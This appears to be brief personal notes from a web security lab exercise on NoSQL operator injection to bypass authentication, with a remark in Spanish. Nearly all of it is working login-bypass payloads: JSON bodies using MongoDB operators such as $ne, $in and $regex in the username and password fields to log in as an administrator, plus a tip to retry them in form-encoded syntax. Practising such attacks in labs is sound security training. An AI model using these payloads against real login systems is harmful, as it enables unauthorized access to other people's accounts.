2 - Exploiting NoSQL operator injection to bypass authentication

{"username":"administrator","password":{"$ne" :"peter"}}

{"username":{"$in":["admin","administrator","superadmin"]},"password":{"$ne":""}}

Cambiar a form urlencoded y probar con [$ne].

{"$regex":"wien.*"}
{"$regex":"admin.*"}